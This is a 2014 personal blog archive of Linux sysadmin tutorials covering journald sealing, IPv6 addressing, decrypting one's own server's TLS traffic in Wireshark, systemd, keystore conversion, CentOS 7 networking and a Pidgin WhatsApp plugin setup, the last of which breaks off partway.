Showing posts with label analysis. Show all posts
Showing posts with label analysis. Show all posts

Sunday, October 12, 2014

Enable FSS in journald and verify using journalctl

Last we learned the basic of journalctl, today we will enable FSS in journald.

Forward Secure Sealing or FSS allows application to cryptographically "seal" the system logs in regular time intervals, so that if your machine is hacked the attacker cannot alter log history (but can still entirely delete it). It works by generating a key pair of "sealing key" and "verification key".

read more at https://eprint.iacr.org/2013/397

Okay, let's set it up. With this, we will use CentOS 7 for learning.

As root, let's setup the keys.
[root@centos7-test1 ~]# journalctl --setup-keys
/var/log/journal is not a directory, must be using persistent logging for FSS.

Hmm.. not possible because /run is mounted on tmpfs. We will now enable persistent storage for journald.

  1. as root, create directory # mkdir -p /var/log/journal 

  2. edit /etc/systemd/journald.conf and uncomment the following.

    1. Storage=persistence

    2. Seal=yes



  3. restart journald using command systemctl restart systemd-journald 

  4. Rerun command journalctl --setup-keys. See screenshot below.
    journald-fss

  5. Now we verify the log using command
    [root@centos7-test1 ~]# journalctl --verify
    PASS: /var/log/journal/e25a4e0b618f43879af033a74902d0af/system.journal



Looks good. Although I am not sure what is the verify-key as different verify key is used, it is always passed. Probably it will be fail if the logging is tampered.

Saturday, October 11, 2014

Learning IPv6

Recently I was fortunate enough to enable IPv6 on the router and all connected devices are now with IPv6 addresses. You will ask why would one want to switch to use IPv6?

Let's start simple, look at the graph at https://www.google.com/intl/en/ipv6/statistics.html , there is a trend growing in IPv6 adoption since mid yeer 2010. If that's not convincing enough to enable IPv6 in the router, then read on. I will explain based on the article found here.

First, what is IPv6?

Internet Protocol version 6 (IPv6) is the latest version of the Internet Protocol (IP), the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet. IPv6 was developed by the Internet Engineering Task Force (IETF) to deal with the long-anticipated problem of IPv4 address exhaustion.

Because IPv4 address is exhausted with the current addresses usage trends, more devices released soon will not get be able to get a unique public address from IPv4 pool.

Below is a summary in points form of the facts of IPv6.

  •  As of June 2014, the percentage of users reaching Google services with IPv6 surpassed 4% for the first time.

  • IPv6 uses a 128-bit address, allowing 2128, or approximately 3.4 × 1038 addresses. whilst IPv4 used 32-bit address and provide only 4.3 billion addresses.

  • IPv4 and IPv6 are not interoperable and thus adoption has been slow. To expedite the adoption, there are transition mechanisms have been devised to permit communication between IPv4 and IPv6 hosts.

  • IPv6 was first formally described in Internet standard document RFC 2460, published in December 1998.

  • IPv6 simplifies aspects of address assignment (stateless address autoconfiguration), network renumbering and router announcements when changing network connectivity providers.

  • IPv6 simplifies processing of packets by routers by placing the need for packet fragmentation into the end points.

  • The standard size of a subnet in IPv6 is 264 addresses, the square of the size of the entire IPv4 address space.

  • IPv6 does not implement traditional IP broadcast, i.e. the transmission of a packet to all hosts on the attached link using a special broadcast address, and therefore does not define broadcast addresses. In IPv6, the same result can be achieved by sending a packet to the link-local all nodes multicast group at address ff02::1, which is analogous to IPv4 multicast to address 224.0.0.1.

  • The IPv6 packet header has a fixed size (40 octets).

  • IPv4 limits packets to 65535 (216−1) octets of payload. An IPv6 node can optionally handle packets over this limit, referred to as jumbograms, which can be as large as 4294967295 (232−1) octets.

  • In the Domain Name System, hostnames are mapped to IPv6 addresses by AAAA resource records, so-called quad-A records.


Ipv6_header

IPv6 addresses are represented as 8 groups of four hexadecimal digits separated by colons, for example 2001:0db8:85a3:0042:1000:8a2e:0370:7334, but methods of abbreviation of this full notation exist.  Each group is written as 4 hexadecimal digits and the groups are separated by colons (:). IPv6 unicast addresses other than those that start with binary 000 are logically divided into two parts: a 64-bit (sub-)network prefix, and a 64-bit interface identifier.

Ipv6_address_leading_zeros

For convenience, an IPv6 address may be abbreviated to shorter notations by application of the following rules, where possible.

  • One or more leading zeroes from any groups of hexadecimal digits are removed; this is usually done to either all or none of the leading zeroes. For example, the group 0042 is converted to 42.

  • Consecutive sections of zeroes are replaced with a double colon (::). The double colon may only be used once in an address, as multiple use would render the address indeterminate.


An example of application of these rules:

  • Initial address: 2001:0db8:0000:0000:0000:ff00:0042:8329

  • After removing all leading zeroes: 2001:db8:0:0:0:ff00:42:8329

  • After omitting consecutive sections of zeroes: 2001:db8::ff00:42:8329


The loopback address, 0000:0000:0000:0000:0000:0000:0000:0001, may be abbreviated to ::1 by using both rules.

Stateless Autoconfiguration

IPv6 lets any host generate its own IP address and check if it's unique in the scope where it will be used. IPv6 addresses consist of two parts. The leftmost 64 bits are the subnet prefix to which the host is connected, and the rightmost 64 bits are the identifier of the host's interface on the subnet. This means that the identifier need only be unique on the subnet to which the host is connected, which makes it much easier for the host to check for uniqueness on its own.

|Subnet Prefix 64 bits | Interface identifier 64 bits |

The mac address is used to derive the address for interface link local. I have written blog on how to do just that. please read here.

With the link-local derived, without the prefix fe80, and then use the remaining by concat with the network lan IPv6 prefix.

So an example of mac address 4c:33:22:11:aa:ee

Derived link local fe80::4e33:22ff:fe11:aaee

Public ip 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee where 2001:e68:5424:d2dd is the network lan IPv6 prefix assigned by the router and 4e33:22ff:fe11:aaee is the local-link address without prefix fe80.

Dual IP stack implementation

Dual-stack (or native dual-stack) refers to side-by-side implementation of IPv4 and IPv6. That is, both protocols run on the same network infrastructure, and there's no need to encapsulate IPv6 inside IPv4 (using tunneling) or vice-versa. Dual-stack is defined in RFC 4213.

The dual-stack should only be considered as a transitional technique to facilitate the adoption and deployment of IPv6, as it has some major drawbacks and consequences: it will not only more than double the security threats from both IPv4 and IPv6 for the existing network infrastructure, but also ultimately overburden the global networking infrastructure with both dramatically increased Internet traffic. The ultimate objective is to deploy the single stack of IPv6 globally.

There are others which can be found in the wikipedia, http://en.wikipedia.org/wiki/IPv6 but the above should get you started. It works for me the first time I enable IPv6 and it works wonder after that.

Friday, October 10, 2014

Derive IPv6 link-local address for network interface

When you show the interface configuration using command ip, you will noticed there is a inet6 address start with fe80. Today, we will learn what is this and how this address is derive. Example below
user@localhost:~$ ip addr show wlan0
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
link/ether 4c:33:22:11:aa:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.133.50/24 brd 192.168.133.255 scope global wlan0
valid_lft forever preferred_lft forever
inet6 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::4e33:22ff:fe11:aaee/64 scope link
valid_lft forever preferred_lft forever

So first, what is Link-local address?

In a computer network, a link-local address is a network address that is valid only for communications within the network segment (link) or the broadcast domain that the host is connected to.

Link-local addresses are usually not guaranteed to be unique beyond a single network segment. Routers therefore do not forward packets with link-local addresses.

For protocols that have only link-local addresses, such as Ethernet, hardware addresses that the manufacturer delivers in network circuits are unique, consisting of a vendor identification and a serial identifier.

Link-local addresses for IPv4 are defined in the address block 169.254.0.0/16, in CIDR notation. In IPv6, they are assigned with the fe80::/10 prefix.

So it is a wire address that is locally within a segment of a network and it is not routable beyond a router.

With this said, let's calculate link-local address.

1. take the mac address from ip command.
from above example 4c:33:22:11:aa:ee

2. add ff:fe in the middle of the current mac address.
4c:33:22:ff:fe:11:aa:ee

3. reformat to IPv6 notation by concatenate two hex groups into one.
4c33:22ff:fe11:aaee

4. convert the first octet from hexadecimal to binary
4c -> 01001100

5. invert the bit at position 6, starting from left with first bit as 0.
01001100 -> 01001110

6. convert the octet back in step 5 back to hexadecimal
01001110 -> 4e

7. replace first octet with newly calculated from step 6.
4e33:22ff:fe11:aaee

8. prepend the link-local prefix
fe80::4e33:22ff:fe11:aaee

That's it.

Sunday, September 28, 2014

Learning getting ssl traffic using wireshark and analyze ssl traffic.

Today we are going to study ssl using trace from wireshark. As such, there are few efforts we will need to do and summarize as below.

  1. setup a web server that has ssl certificate configured.

  2. get the network traffic using wireshark.

  3. decode and analyze the network traffic using wireshark.


So first, what is SSL?

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols designed to provide communication security over the Internet.[1] They use X.509 certificates and hence asymmetric cryptography to authenticate the counterparty with whom they are communicating, and to exchange a symmetric key.

If you already have a web server with ssl certicate configured, you can skip step 1. This is the documentation which I used primarily. You may not succeed on the first attempt as it took me several attempts to get the ssl traffic decrypted.  Words of advice, just do not give up.

1. setup a web server that has ssl certificate configured.

With this, you can either get the certificate from an authority or you can generate one. If you do not know how, you can google or you can request in the comment, maybe in the future, I will write a simple one. But here, I assume you have the certicate ready.

In the web server, with apache httpd being the most common, edit the configuration file. In the apache directory, edit the ssl.conf. Example.
<apache httpd directory>/sites-available/default-ssl.conf

SSLCertificateFile /etc/apache2/sites-available/abc_cert.pem
SSLCertificateKeyFile /etc/apache2/sites-available/abc_private_key.pem

change to according where you place the certificate and its private key. Enable this site and restart apache httpd and then you are set. I won't go into details for troubleshoothing problem if you encounter as this is not the main focus of this article and should leave as an exercise.

2. get the network traffic using wireshark.

Make sure wireshark that is currently installed has GnuTLS compiled. You can check using command below. The output must have GnuTLS and Gcrypt available.
$ wireshark --version | grep GnuTLS
with GnuTLS 2.12.23, with Gcrypt 1.5.3, with MIT Kerberos, with GeoIP, with
1.6.1, with libz 1.2.8, GnuTLS 2.12.23, Gcrypt 1.5.4, without AirPcap.

Then now launch wireshark using root. Ignore about the warnings or information you receive during launch wireshark as root. Note, you can also using dumpcap when you need to capture in the server, but I have not verify if this solution is working. $ sudo dumpcap -i wlan0 -f 'host 192.168.133.49 and tcp port 443' . Probably not because you need to configure the server private key and the client (browser) random key. That should leave as another exercise.
$ sudo wireshark

There are some fields black out for obvious reason, we want to protect the server and client. But it should be self descriptive when you complete the steps as mentioned here.

We will first configure section in ssl configuration so that wireshark will be able to decrypt the data traffic. As such, you will need the server private key, which you can get from step 1 above. To configure that, go to Edit then Preferences... see screenshot below.

wireshark_edit_preference

A window from Wireshark: Preferences pop up. Now on the left menu, expand the Protocols in the tree and look for SSL.  See screenshot below.

wireshark_preference_window

First, we will configure RSA keys list. Click on the Edit... button. Then another window pop up. Now add the server key. There are four out of five fields you need to fill in. See screenshot below for final output. Here I will explain the fields.

wireshark_ssl_rsa_configuration























IP addressThe IP address of the SSL server in IPv4 or IPv6 format, or the following special values: any, anyipv4, anyipv6, 0.0.0.0. Put your server hostname or ip address if you know.
PortThe TCP port number, or the special value start_tls or 0. For web server, normally it run on port 443 and in this example, I gave port 443 because it is a remote server listening https traffic on port 443.
ProtocolA protocol name for the decrypted network data. Popular choices are http or data. If you enter an invalid protocol name an error message will show you the valid values. Because http data are encrypted using ssl, thus, we should put value http here.
Key Filepath to the RSA private key. So locate where you put the server private key at your local workstation and then select the file here.
Passwordonly needed when the private key is in format PCKS#12 (typically a file with a .pfx or .p12 extension). In step 1, the server private key is in format PEM and thus, for this field, you can leave it empty. Saved by clicking OK. Click on Apply and then OK.

The next field we are going to configure is the SSL debug file. This is a file written by this ssl module and I recommend you put a valid value here. You can tail this file later when the capture is started and you can inspect this file quickly (on the fly) when the decryption is happening. It is very good when your ssl decryption went wrong and this serve as a source of debug.

You should check the following fields.

  • Reassemble SSL records spanning multiple TCP segments

  • Reassemble SSL Application Data spanning multiple SSL records


Leave the field Message Authentication Code (MAC), ignore "mac failed and Pre-Shared-Key as is.

For the last field, (Pre)-Master-Secret log filename, fill in a value where in the next step, you will configure for the web browser environment. This is a file written by the client (web browser in our example) which is used by the client as a key to encrypt the data. Wireshark will read this file to decrypt the data.

That's it for the configuration, click on Apply button and OK button.

Now open another terminal and we will setup the environment so that client (browser) will dump the random key. Browser chromium will start to dump the keys to the file premaster.txt.
user@localhost:~$ export SSLKEYLOGFILE=/home/user/premaster.txt
user@localhost:~$ chromium

Now tail the ssl debug file and this premaster file in another two terminal tabs and watch the progress.

Right now, we will capture the traffic. To do that, click on Capture from the menu then Options... See the screenshot below. Set the configuration correctly, I check wlan0 because this is a laptop where the https request will flow to and fro within this channel. Capture filter, put on the host and the IP address of the web server where you configure in step 1 above. In this example, my server ip address is 192.168.133.49, so host 192.168.133.49.

wireshark_capture_option

To start the capture, click on the Start button.

Now, trigger a https call to the server from the web browser (in this example, chromium) and watch wireshark capture and decrypt the https data! Check also the tabs in terminal when debug log and premaster.txt are rolling. Click on stop button when you are satisfy with the https request.

3. decode and analyze the network traffic using wireshark.

From step 2 above, you are now have a complete ssl dumped and it is decrypted! See screenshot below. You may have noticed that SSL data has another tab at the bottom know as Decrypted SSL data. In this screenshot, it is 9000bytes. Pretty awesome I must say.

wireshark_decrypted_data

Right click on the row of packet which has protocol TLSv1 and click on Follow SSL Stream. It will show the encrypted ssl traffic (https) which has been decrypted into a http traffic.

That's it folks. I hope you learn something and please visit on donation page to donate to us.

Saturday, September 27, 2014

Study journalctl in CentOS 7

In CentOS 7, the new systemd has a new journaling app, known as journalctl. Today, we will study journalctl. First, what is journalctl?

journalctl is a client app to query the systemd journal. Systemd journal is written by systemd-journald.service.

Let's sudo into root and we will study journalctl via examples.
[user@localhost ~]$ sudo su -
Last login: Sat Sep 13 11:57:55 CEST 2014 on pts/0
[user@localhost ~]# journalctl
-- Logs begin at Mon 2014-09-01 14:57:19 CEST, end at Mon 2014-09-15 10:52:52 CEST. --
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuset
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpu
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuacct
Sep 01 14:57:19 localhost kernel: Linux version 3.10.0-123.6.3.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GC
Sep 01 14:57:19 localhost kernel: Command line: BOOT_IMAGE=/vmlinuz-3.10.0-123.6.3.el7.x86_64 root=UUID=bbbbbbbb-7777-465a-993a-888888888888 ro nomodeset rd.a
Sep 01 14:57:19 localhost kernel: e820: BIOS-provided physical RAM map:
...
...
...
Sep 15 10:57:00 foo.example.com sshd[23533]: Received disconnect from 123.123.123.123: 11: disconnected by user
Sep 15 10:57:00 foo.example.com systemd-logind[1161]: Removed session 9773.
Sep 15 10:59:04 foo.example.com sshd[23813]: Accepted publickey for foobar from 132.132.132.132 port 36843 ssh2: RSA 68:68:68:68:68:86:68:68:68:68:68:68:0
Sep 15 10:59:04 foo.example.com systemd[1]: Created slice user-1005.slice.
Sep 15 10:59:04 foo.example.com systemd[1]: Starting Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd-logind[1161]: New session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd[1]: Started Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com sshd[23813]: pam_unix(sshd:session): session opened for user foobar by (uid=0)
lines 53881-53917/53917 (END)

As you may noticed, journalctl show all the logging since the system was booted until at this moment. So there are a lot of lines and data to be interpreted. So you might want to look into the parameters accepted for this application.

If you want to show most recent log, give -r. This will reverse the ordering by showing newest entries first. If you want to show newest ten lines, give -n as a parameter. Example journalctl -r -n 10

To show how much all these log take the disk space, give --disk-usage. Note that journal logs are stored in the directory /run/log/journal and not /var/log.

If you want to show only log from a unit(service), give --unit. Example journalctl --unit=sshd will show logging for sshd only. Very neat!

Sometime you just want to monitor a certain range of date and/or time. You can append parameter --since and --until. Example journalctl --since="2014-09-14 01:00:00" --until="2014-09-14 02:00:00" it will show all journal within that duration of 1hour. I think this is really good for system monitoring, system support or even during finding trace of compromised system.

If you want the journal logs to appear in web interface, you can format the logging to a format the web application supported. As of this time of writing, journalctl supported the following format.











































shortis the default and generates an output that is mostly identical to the formatting of classic syslog files, showing one line per journal entry.
short-isois very similar, but shows ISO 8601 wallclock timestamps.
short-preciseis very similar, but shows timestamps with full microsecond precision.
short-monotonicis very similar, but shows monotonic timestamps instead of wallclock timestamps.
verboseshows the full-structured entry items with all fields.
exportserializes the journal into a binary (but mostly text-based) stream suitable for backups and network transfer (see Journal Export Format[1] for more information).
jsonformats entries as JSON data structures, one per line (see Journal JSON Format[2] for more information).
json-prettyformats entries as JSON data structures, but formats them in multiple lines in order to make them more readable for humans.
json-sseformats entries as JSON data structures, but wraps them in a format suitable for Server-Sent Events[3].
catgenerates a very terse output only showing the actual message of each journal entry with no meta data, not even a timestamp.

json would probably comes in mind to display the logging on web interface.

There is also a feature known as Foward Secure Sealing where the log will be encrypted using a sealing key and the log can be verified using a verification key. You can check on parameter such as, --setup-keys --interval --verify --verify-key. We won't cover FFS in this article, perhaps sometime in the future, I will devote an article on how to set this up.

There are also many other good option that help you analyze the log using different strategy like -b, -p and logical operator but that this article should be able to give you a head start. You can find more information through journalctl manual.

Friday, September 26, 2014

transition from sysV to systemd, from chkconfig to systemctl

If you have just been installed CentOS 7.0 and as usual, command chkconfig is executed
to list what processes will be start on boot. As seen below:
[root@localhost ~]# chkconfig

Note: This output shows SysV services only and does not include native
systemd services. SysV configuration data might be overridden by native
systemd configuration.

If you want to list systemd services use 'systemctl list-unit-files'.
To see services enabled on particular target use
'systemctl list-dependencies [target]'.

iprdump 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprinit 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprupdate 0:off 1:off 2:on 3:on 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
tomcat 0:off 1:off 2:off 3:off 4:off 5:off 6:off

That's odd, something has changed. For your information, sysV has been replaced in favor of systemd and today we are going to learn what is systemd is. So what is systemd ?

systemd is a system and service manager for Linux, compatible with SysV and LSB init scripts. systemd provides aggressive parallelization capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, keeps track of processes using Linux cgroups, supports snapshotting and restoring of the system state, maintains mount and automount points and implements an elaborate transactional dependency-based service control logic. It can work as a drop-in replacement for sysvinit. 

That is a very lengthy definition. If you are still not so sure, perhaps take a moment to watch a video here.



Because there are a lot of documentations in the google to explain what is systemd in details, but this article will target busy people who need the solution right now. As such, if you want more details solutions, you should google or read a few helpful links below.

So why replace sysV with systemd? What have been improved?

Lennart Poettering and Kay Sievers, the software engineers who initially developed systemd,[1] sought to surpass the efficiency of the init daemon in several ways. They wanted to improve the software framework for expressing dependencies; to allow more processing to be done concurrently or in parallel during system booting; and to reduce the computational overhead of the shell.

Systemd's initialization instructions for each daemon are recorded in a declarative configuration file rather than a shell script. For inter-process communication, systemd makes Unix domain sockets and D-Bus available to the running daemons. Systemd is also capable of aggressive parallelization.

There are several tools to manage systemd.

  • systemctl:
    used to introspect and control the state of the systemd system and service manager

  • systemd-cgls:
    recursively shows the contents of the selected Linux control group hierarchy in a tree

  • systemadm:
    a graphical frontend for the systemd system and service manager that allows introspection and control of systemd. Part of the systemd-gtk package. This is an early version and needs more work. Do not use it for now unless you are a developer.


Below are a table to summarize what you usually done in chkconfig and in systemd, what command you can use as a replacement.











































































Sysvinit CommandSystemd CommandNotes
service frobozz startsystemctl start frobozz.serviceUsed to start a service (not reboot persistent)
service frobozz stopsystemctl stop frobozz.serviceUsed to stop a service (not reboot persistent)
service frobozz restartsystemctl restart frobozz.serviceUsed to stop and then start a service
service frobozz reloadsystemctl reload frobozz.serviceWhen supported, reloads the config file without interrupting pending operations.
service frobozz condrestartsystemctl condrestart frobozz.serviceRestarts if the service is already running.
service frobozz statussystemctl status frobozz.serviceTells whether a service is currently running.
ls /etc/rc.d/init.d/systemctl list-unit-files --type=service (preferred)
ls /lib/systemd/system/*.service /etc/systemd/system/*.service
Used to list the services that can be started or stopped Used to list all the services and other units
chkconfig frobozz onsystemctl enable frobozz.serviceTurn the service on, for start at next boot, or other trigger.
chkconfig frobozz offsystemctl disable frobozz.serviceTurn the service off for the next reboot, or any other trigger.
chkconfig frobozzsystemctl is-enabled frobozz.serviceUsed to check whether a service is configured to start or not in the current environment.
chkconfig --listsystemctl list-unit-files --type=service(preferred)
ls /etc/systemd/system/*.wants/
Print a table of services that lists which runlevels each is configured on or off
chkconfig frobozz --listls /etc/systemd/system/*.wants/frobozz.serviceUsed to list what levels this service is configured on or off
chkconfig frobozz --addsystemctl daemon-reloadUsed when you create a new service file or modify any configuration

Runlevels/targets

Systemd has a concept of targets which serve a similar purpose as runlevels but act a little different. Each target is named instead of numbered and is intended to serve a specific purpose.













































Sysvinit RunlevelSystemd TargetNotes
0runlevel0.target, poweroff.targetHalt the system.
1, s, singlerunlevel1.target, rescue.targetSingle user mode.
2, 4runlevel2.target, runlevel4.target, multi-user.targetUser-defined/Site-specific runlevels. By default, identical to 3.
3runlevel3.target, multi-user.targetMulti-user, non-graphical. Users can usually login via multiple consoles or via the network.
5runlevel5.target, graphical.targetMulti-user, graphical. Usually has all the services of runlevel 3 plus a graphical login.
6runlevel6.target, reboot.targetReboot
emergencyemergency.targetEmergency shell

Below are a summarize the command you will (hopefully) use.

  • systemctl isolate multi-user.target
    To change the target/runlevel, to switch to runlevel 3

  • systemctl set-default <name of target>.target
    graphical.target is the default. You might want multi-user.target for the equivalent of non graphical (runlevel 3) from sysv init.

  • systemctl get-default
    to show the currentl target/runlevel


Note, there are several changes you should keep in mind.
* systemd does not use /etc/inittab file.
* change number of gettys in /etc/systemd/logind.conf
* unit files are now store in /usr/lib/systemd/system/

That's it, I hope you get a basic understanding and will be able to start using systemd.

Sunday, September 14, 2014

How to convert java keystore to format apache httpd understand

If you received a java keystore file from a Certificate Authority and want to use this cert to setup in apache httpd ssl, you will meet failure, at least I did. So today, I will share my finding on how to convert java keystore file into PEM format which is understand by apache httpd.

So how do you know if a certificate signed by CA is of type java keystore? Simple, just check the content using keytool. Keytool is an app come together when you install java environment.
$ keytool -list -keystore abc.jks
Enter keystore password:

Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

ABC_Certificate, Aug 19, 2013, PrivateKeyEntry,
Certificate fingerprint (MD5): 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

As you can read above, this is a valid java keystore file and we will now convert to a intermittent format, pkcs12 first. We will use keytool again to do the conversion.
$ keytool -importkeystore -srckeystore abc.jks -destkeystore abc.p12 -srcalias ABC_Certificate -srcstoretype jks -deststoretype pkcs12
Enter destination keystore password:
Re-enter new password:
Enter source keystore password:
$

the output abc.p12 is the certificate in pkcs12 and now we are ready to convert to pem format. We will use openssl to do this conversion.
$ openssl pkcs12 -in myapp.p12 -out myapp.pem
Enter Import Password:
MAC verified OK
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
$

You can basically use myapp.pem for the field in SSLCertificateFile and SSLCertificateKeyFile but unfortunately when apache httpd is restarted, it will ask for the private key passphrase. With the following steps, we will remove the passphrase from the private key.

Removed passphrase so when apache httpd instance is restarted, it will not ask for password.
$ openssl rsa -in abc.pem -out abc_private_key.pem
Enter pass phrase for abc.pem:
writing RSA key
$ openssl x509 -in abc.pem >>abc_cert.pem

As you noticed, right now you end up with the certificate private key and the certificate. Now move these two files, abc_private_key.pem and abc_cert.pem to a directory in the apache httpd server and change the ssl configuration in apache httpd.
SSLCertificateFile    /path/to/the/directory/contain/abc_cert.pem
SSLCertificateKeyFile /path/to/the/directory/contain/abc_private_key.pem

That's it, I hope it works for you too.

Friday, September 12, 2014

Understand basic network configuration in CentOS 7

With the recent release of CentOS7, today we are going to check out the basic network configuration. My usual quick command, ifconfig.
[root@localhost ~]# ifconfig
-bash: ifconfig: command not found

it seem like ifconfig is not longer there, note that if you do upgrade from centos 6.x , you should be aware of this. If you are going to configure network interface, start to get familiar to command ip. But if you want command ifconfig, you can still install the package net-tools.

Let's restart network interface.
[root@centos7-test1 network-scripts]# service network restart
Restarting network (via systemctl): [ OK ]
[root@centos7-test1 network-scripts]# service network status
Configured devices:
lo eth0
Currently active devices:
lo eth0
[root@centos7-test1 init.d]# systemctl restart network
[root@centos7-test1 init.d]# systemctl status network
network.service - LSB: Bring up/down networking
Loaded: loaded (/etc/rc.d/init.d/network)
Active: active (exited) since Tue 2014-07-15 14:33:28 CEST; 13s ago
Process: 11597 ExecStop=/etc/rc.d/init.d/network stop (code=exited, status=0/SUCCESS)
Process: 11753 ExecStart=/etc/rc.d/init.d/network start (code=exited, status=0/SUCCESS)

Jul 15 14:33:27 centos7-test1 network[11753]: Bringing up loopback interface: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 network[11753]: Bringing up interface eth0: Connection successfully activated (D-Bus active path: /org/...tion/3)
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 systemd[1]: Started LSB: Bring up/down networking.
Hint: Some lines were ellipsized, use -l to show in full.

Noticed that service manager now is done via systemctl, C7 is using systemctl in replace of SysV.  Also notice configuration file for ifcfg-lo is not loadable? This issue has been file here.

Upstream has changed the default networking service is provided by NetworkManager, which is a dynamic network control and configuration daemon that attempts to keep network devices and connections up and active when they are available.

If it does not install for any reason (which it should not because it comes with predefault installation), you can follow these commands
# # install it
# yum install NetworkManager
# # ensure network manager service is started everything system boot up.
# systemctl enable NetworkManager
# # manual start for now.
# systemctl start NetworkManager
# # check the status.
[root@centos7-test1 ~]# systemctl status NetworkManager
NetworkManager.service - Network Manager
Loaded: loaded (/usr/lib/systemd/system/NetworkManager.service; enabled)
Active: active (running) since Tue 2014-07-15 13:39:18 CEST; 3h 40min ago
Main PID: 679 (NetworkManager)
CGroup: /system.slice/NetworkManager.service
├─ 679 /usr/sbin/NetworkManager --no-daemon
└─11896 /sbin/dhclient -d -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-eth0.pid -lf /var/lib/NetworkManager/dhclient-55911be2-9763-471f...

Jul 15 17:05:21 centos7-test1 NetworkManager[679]: bound to 192.168.0.116 -- renewal in 3581 seconds.
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> (eth0): DHCPv4 state changed renew -> renew
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> address 192.168.0.116
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> plen 24 (255.255.255.0)
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> gateway 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> server identifier 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> lease time 7200
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '192.168.0.1'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '8.8.8.8'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> domain name 'PowerRanger'

If you are configuring manually remotely, you can use command nmtui. nmtui is a simple curses-based text user interface. But if you want to configure interface using script, better still to use command ip or nmcli. For more information, you can read here.

That's it for this article. I would like to thank my buddy for kind enough to let me ssh and study centos 7 in his host. :) you know who you are! dankeschon!

Sunday, August 31, 2014

How to setup pidgin WhatsApp using credential from Nokia n900

If you own a smart phone from Nokia, model n900, you are in luck to use WhatsApp
on your pc. The intention here is personal usage as sometime you ran out of
power in n900 whilst on a important conversation with friends. By setup up
whatsapp in pidgin messenger chatting software on linux, you can also save the
trouble of switch devices back and forth. This is intended for personal usage.

In this article, we are going to learn how to setup pidgin and so it can connect
to WhatsApp with the registration made in Nokia n900. Of cause, first, in n900,
you will need to install yappari, a whatsapp client for n900 and register yourself
an account in whatsapp. This article will not cover on how to install yappari
in n900 and getting an whatsapp account in yappari because it is very easy.

The official website of this plugin available here.  At the bottom of the site, there are several links to the operating system.

  • Windows/Linux: http://davidgf.net/nightly/whatsapp-purple/

  • Ubuntu/Debian: https://launchpad.net/~whatsapp-purple/+archive/ubuntu/ppa

  • Fedora: https://copr.fedoraproject.org/coprs/davidgf/whatsapp-purple/

  • ArchLinux: https://aur.archlinux.org/packages/purple-whatsapp/


If you do not want to go through the hassle of setting up apt repository , what you can do quickly is by

  1. go to this link

  2. depending on what cpu architecture, if it is 64bit cpu, click on x64/ http://davidgf.net/nightly/whatsapp-purple/x64/

  3. pick the latest version, that is last-whatsapp.so and download to your computer.

  4. then with root access, copy the lib to pidgin plugin directory.
    # cp last-whatsapp.so /usr/lib/purple-2

  5. restart your pidgin.


At this moment of writing, I'm using last-whatsapp.so on the server with date of
this file is 31-Jul-2014 01:02 of 313075 bytes. Meanwhile for pidgin, the version
I'm using in debian is Pidgin 2.10.9 (libpurple 2.10.9) and this works very well for
me.

Once pidgin restarted, go to Manage Accounts and then click on Add button. This is
to add the WhatsApp account that you have setup in yappari. In the pop up Add Account
window, under protocol field, there should be a new protocol WhatsApp available in the
drop down selection. Pick that.

For Username and Password is very tricky here.
Username will be the phone number that you registered in yappari and as for password, you will need some work to retrieve from yappari configuration file in n900. But we will goes through this step by step.

Let's start with the easy one. The username field. It will be your country code follow by your mobile number without the prefix plus sign. For instance, if your mobile sim card is malaysian registered, it will be something like.

Username: 60123456789

Because the password which I'm gonna show you later will be a difficult one, I suggest you check the button Remember password. Unless you are paranoid, you can try to remember your password. Your choice.

For the field Local alias, it will be your name, just put anything that you like to identify yourself.

Now onto the password field, if you notice during registration, there is no procedure nor password sent to you. The only verification WhatsApp need is to identify this is a valid registration when you register an account. Note that WhatsApp code that sent to your phone is not your password.

